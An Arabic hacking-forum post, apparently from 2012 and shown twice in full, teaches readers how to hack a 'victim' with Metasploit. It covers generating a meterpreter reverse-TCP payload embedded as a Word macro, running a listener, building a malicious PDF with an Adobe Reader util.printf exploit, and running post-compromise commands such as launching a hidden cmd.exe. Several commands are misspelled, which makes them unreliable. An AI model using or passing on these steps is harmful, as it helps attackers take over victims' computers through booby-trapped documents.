rss
08-31-2012, 05:51 PM
http://img860.imageshack.us/img860/9039/mlfati513e3dcf8e.png
شلؤؤنكم شخباركم . .
بطرح لكم ثغرتين بالميتاسبلويت ومهمات بشكل غير طبيعي
انصح البعض بسلك طريق غير التشيفرات وشروحاته !
خلونا نرفع اسم المنتدى بمعنى الكلمه
[ نقطه التطوير ]
:32:
http://img28.imageshack.us/img28/8697/35d89d0jpg.gif
كما موضح بعنوان الموضوع :
الاختراق بثغرتين الاولى على سبيل المثال [ Dev-PoinT.Doc ]
آو بالاصح [ PayLoaD ] ملغم بمـلف [ WoRd ] ~
^ راح نستعين ببرنامج اجزم انه مفضل لديكم جميعاً :15: :
Visual Basic 6.0 (http://www.eshrag.net/vb/!320215!http://www.dev-point.com/vb/t320215.html)
نبدي بأسم الرحمن الرحيم . .
الامر الاول الي يلزمنا بالميتا سبلويت وهو كالمعروف
تؤليد آلبآيلود !
طريقه فتح الميتا وشاشه الـ CmD
[ من آبداء > البرامج > CMD S h e e l < M3tasploit 3 ]
او
[ Sart > Program > M3tasploit 3 > CMD S h e e l ]
راح تطلع معانا شآشه آلسي آم دي شل ~
نكتب امر التوليد :
اقتباس:
ruby msfpayload windows/meterpreter/reverse_tcp LHOST=127.0.0.1 V > "C:\ManegarPlay.bas"
http://img682.imageshack.us/img682/43/48926854.gif
ونزل عندي البايلود بقرص آلسي ملف بأمتداد bas :
http://img571.imageshack.us/img571/9734/81584207.gif
الحين نظغط كليك يمين بمكان فاضي بقرص السي :
كليك يمين بمكآن فآضي جديد > مستند Microsoft Word
http://img822.imageshack.us/img822/3697/83112649.gif
نفتح ملف آلوورد ومن فوق ادوات > ماكرو > محرر Visual Basic
http://img704.imageshack.us/img704/4910/23571871.gif
من شرريط آلقوآئم > Import File < File
http://img59.imageshack.us/img59/7159/81596811.gif
ونحدد آلبآيلؤد آلي بقرص السي .bas . .
http://img210.imageshack.us/img210/971/44651023.gif
تم آضآفه موديل بآلمشروع !
آلحين نحفظ آلمشروع ~
http://img295.imageshack.us/img295/4167/62543711.gif
آلحين نسوي تنصت
وهذا كود آلتنصت :
اقتباس:
ruby msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=127.0.0.1 E
http://img696.imageshack.us/img696/8010/30518996.gif
بدآء عمليه آلتنصت
كل مآعليك بعد عمليه آلتنصت آنك تدز الملف للضحيه :6:
وآول مآيفتحه آلضحيه تبدآء لعبك آنت ~
فـ مثال كود بسيط وهو [ sysinfo ] < يعني معلومآت عن آلنظآم !
وآوآمر آلميتآ كثيره !
http://img28.imageshack.us/img28/8697/35d89d0jpg.gif
الحين مع
ثغره لشركه آلادوبي آلمصدره لبرآمج آلادوبي بكافه آنواعها !
آلثغره :
' AdoBe ReaDeR 8.2.1_AdoBe UtiL '
آصدآر آلبرنامج آلمصآب :
[ 8.1.2 ]
آلويندوز آلمصاب :
[ WinDowS xP SP3 ]
آلبآيلؤد :
[ windows/meterpreter/reverse_tcp ]
آلاستغلآل :
[ exploit/windows/filefermat/adobe_utilprintf ]
http://img28.imageshack.us/img28/8697/35d89d0jpg.gif
شرح آلثغـره وآلتطبيق !
نفتح آلاداه [ m3tasploit Console ]
http://img294.imageshack.us/img294/8672/74923179.gif
قبل لآ تفتحونها لازم تحدثون آلميتآسبلويت !
http://img819.imageshack.us/img819/5287/22588613.gif
مثل مآتشوفون بجهآزي [ LaSt UpDated 221 days aGo ]
يعني آخر تحديث قبل 221 يوم ! :2:
آلمهم نكمل
آول مآنفتح آداه الميتا [ m3tasploit Console ]
نبداء نكتـب آلاوامر
[1] آلامر آلآول :
[ الاستغلال ]
كود:
use exploit/windows/filefermat/adobe_utilprintf
وبعدهـا نظغط [ EnTeR ] !
[2] آلامر آلثـاني :
[ آسم الملف ]
كود:
set FILENAME/adobe_util
[ آنتر ] Then ClicK !
[3] آلامر آلثالث :
[ توليد آلبآيلؤد ]
كود:
set PAYLOD windows/meterpreter/reverse_tcp
[4] آلامـر الرآبع :
[ آستهداف الايبي = آيبي آلضحيه ]
كود:
كود:
set LHOST 127.0.0.1
[5] الامر الخامس :
[ البورت 4444 = الافترآضي ]
كود:
set LPORT 4444
[6] آلامر السادس :
[ الاستغلآل ]
كود:
exploit
[7] الامر السابع :
[ آستغلال آلمعالج ]
كود:
exploit/multi/handler
[8] الامر الثامن :
[ الدوره آلصحيحه ]
كود:
set ExiOnSession true
[9] الامر التاسع :
[ توليد آلبآيلود ]
كود:
set PAYLOD windows/meterpreter/reverse_tcp
[10] الامر العاشر :
[ آستهداف الايبي = آيبي آلضحيه ]
كود:
set LHOST 127.0.0.1
[11] الامر الحادي عشر :
[ البورت 4444 = الافترآضي ]
كود:
set LPORT 4444
[12] الامر الثاني عشر :
[ آلاستغلال ]
كود:
exploit
رآح ينشيء ملف Reader بسطح المكتب ~
آفتحه وآنطر شوي بشاشه البآش رآح تطلع لك الاوامر !
http://img205.imageshack.us/img205/5089/99577094.gif
جذي تم آقتحام آلجهاز آلمصآب . .
نشوف بعض الاومر !
الامر الاول بعد اقتحام الجهاز ~
[13] الامر الثالث عشر :
[ معلومات النظام ]
كود:
sysinfo
http://img205.imageshack.us/img205/5089/99577094.gif
[14] الامر الرابع عشر :
كود:
getuid
http://img404.imageshack.us/img404/3981/77777.gif
[15] الامر الخامس العاشر :
كود:
execute -H -1 -f cmd.exe
http://img8.imageshack.us/img8/4562/555pv.gif
[16] الامر السادس عشر :
كود:
ipconfig
http://img710.imageshack.us/img710/5916/3333p.gif
تلآحظون آلايبآت وآلاوامر !
مآبقى عليكم آلآ آلتطبيق . . :6:
http://img28.imageshack.us/img28/8697/35d89d0jpg.gif
الى هنا انتهى الموضوع
واتمنى حاز على رضاكم
DeaD SouL
[#]
شلؤؤنكم شخباركم . .
بطرح لكم ثغرتين بالميتاسبلويت ومهمات بشكل غير طبيعي
انصح البعض بسلك طريق غير التشيفرات وشروحاته !
خلونا نرفع اسم المنتدى بمعنى الكلمه
[ نقطه التطوير ]
:32:
http://img28.imageshack.us/img28/8697/35d89d0jpg.gif
كما موضح بعنوان الموضوع :
الاختراق بثغرتين الاولى على سبيل المثال [ Dev-PoinT.Doc ]
آو بالاصح [ PayLoaD ] ملغم بمـلف [ WoRd ] ~
^ راح نستعين ببرنامج اجزم انه مفضل لديكم جميعاً :15: :
Visual Basic 6.0 (http://www.eshrag.net/vb/!320215!http://www.dev-point.com/vb/t320215.html)
نبدي بأسم الرحمن الرحيم . .
الامر الاول الي يلزمنا بالميتا سبلويت وهو كالمعروف
تؤليد آلبآيلود !
طريقه فتح الميتا وشاشه الـ CmD
[ من آبداء > البرامج > CMD S h e e l < M3tasploit 3 ]
او
[ Sart > Program > M3tasploit 3 > CMD S h e e l ]
راح تطلع معانا شآشه آلسي آم دي شل ~
نكتب امر التوليد :
اقتباس:
ruby msfpayload windows/meterpreter/reverse_tcp LHOST=127.0.0.1 V > "C:\ManegarPlay.bas"
http://img682.imageshack.us/img682/43/48926854.gif
ونزل عندي البايلود بقرص آلسي ملف بأمتداد bas :
http://img571.imageshack.us/img571/9734/81584207.gif
الحين نظغط كليك يمين بمكان فاضي بقرص السي :
كليك يمين بمكآن فآضي جديد > مستند Microsoft Word
http://img822.imageshack.us/img822/3697/83112649.gif
نفتح ملف آلوورد ومن فوق ادوات > ماكرو > محرر Visual Basic
http://img704.imageshack.us/img704/4910/23571871.gif
من شرريط آلقوآئم > Import File < File
http://img59.imageshack.us/img59/7159/81596811.gif
ونحدد آلبآيلؤد آلي بقرص السي .bas . .
http://img210.imageshack.us/img210/971/44651023.gif
تم آضآفه موديل بآلمشروع !
آلحين نحفظ آلمشروع ~
http://img295.imageshack.us/img295/4167/62543711.gif
آلحين نسوي تنصت
وهذا كود آلتنصت :
اقتباس:
ruby msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=127.0.0.1 E
http://img696.imageshack.us/img696/8010/30518996.gif
بدآء عمليه آلتنصت
كل مآعليك بعد عمليه آلتنصت آنك تدز الملف للضحيه :6:
وآول مآيفتحه آلضحيه تبدآء لعبك آنت ~
فـ مثال كود بسيط وهو [ sysinfo ] < يعني معلومآت عن آلنظآم !
وآوآمر آلميتآ كثيره !
http://img28.imageshack.us/img28/8697/35d89d0jpg.gif
الحين مع
ثغره لشركه آلادوبي آلمصدره لبرآمج آلادوبي بكافه آنواعها !
آلثغره :
' AdoBe ReaDeR 8.2.1_AdoBe UtiL '
آصدآر آلبرنامج آلمصآب :
[ 8.1.2 ]
آلويندوز آلمصاب :
[ WinDowS xP SP3 ]
آلبآيلؤد :
[ windows/meterpreter/reverse_tcp ]
آلاستغلآل :
[ exploit/windows/filefermat/adobe_utilprintf ]
http://img28.imageshack.us/img28/8697/35d89d0jpg.gif
شرح آلثغـره وآلتطبيق !
نفتح آلاداه [ m3tasploit Console ]
http://img294.imageshack.us/img294/8672/74923179.gif
قبل لآ تفتحونها لازم تحدثون آلميتآسبلويت !
http://img819.imageshack.us/img819/5287/22588613.gif
مثل مآتشوفون بجهآزي [ LaSt UpDated 221 days aGo ]
يعني آخر تحديث قبل 221 يوم ! :2:
آلمهم نكمل
آول مآنفتح آداه الميتا [ m3tasploit Console ]
نبداء نكتـب آلاوامر
[1] آلامر آلآول :
[ الاستغلال ]
كود:
use exploit/windows/filefermat/adobe_utilprintf
وبعدهـا نظغط [ EnTeR ] !
[2] آلامر آلثـاني :
[ آسم الملف ]
كود:
set FILENAME/adobe_util
[ آنتر ] Then ClicK !
[3] آلامر آلثالث :
[ توليد آلبآيلؤد ]
كود:
set PAYLOD windows/meterpreter/reverse_tcp
[4] آلامـر الرآبع :
[ آستهداف الايبي = آيبي آلضحيه ]
كود:
كود:
set LHOST 127.0.0.1
[5] الامر الخامس :
[ البورت 4444 = الافترآضي ]
كود:
set LPORT 4444
[6] آلامر السادس :
[ الاستغلآل ]
كود:
exploit
[7] الامر السابع :
[ آستغلال آلمعالج ]
كود:
exploit/multi/handler
[8] الامر الثامن :
[ الدوره آلصحيحه ]
كود:
set ExiOnSession true
[9] الامر التاسع :
[ توليد آلبآيلود ]
كود:
set PAYLOD windows/meterpreter/reverse_tcp
[10] الامر العاشر :
[ آستهداف الايبي = آيبي آلضحيه ]
كود:
set LHOST 127.0.0.1
[11] الامر الحادي عشر :
[ البورت 4444 = الافترآضي ]
كود:
set LPORT 4444
[12] الامر الثاني عشر :
[ آلاستغلال ]
كود:
exploit
رآح ينشيء ملف Reader بسطح المكتب ~
آفتحه وآنطر شوي بشاشه البآش رآح تطلع لك الاوامر !
http://img205.imageshack.us/img205/5089/99577094.gif
جذي تم آقتحام آلجهاز آلمصآب . .
نشوف بعض الاومر !
الامر الاول بعد اقتحام الجهاز ~
[13] الامر الثالث عشر :
[ معلومات النظام ]
كود:
sysinfo
http://img205.imageshack.us/img205/5089/99577094.gif
[14] الامر الرابع عشر :
كود:
getuid
http://img404.imageshack.us/img404/3981/77777.gif
[15] الامر الخامس العاشر :
كود:
execute -H -1 -f cmd.exe
http://img8.imageshack.us/img8/4562/555pv.gif
[16] الامر السادس عشر :
كود:
ipconfig
http://img710.imageshack.us/img710/5916/3333p.gif
تلآحظون آلايبآت وآلاوامر !
مآبقى عليكم آلآ آلتطبيق . . :6:
http://img28.imageshack.us/img28/8697/35d89d0jpg.gif
الى هنا انتهى الموضوع
واتمنى حاز على رضاكم
DeaD SouL
[#]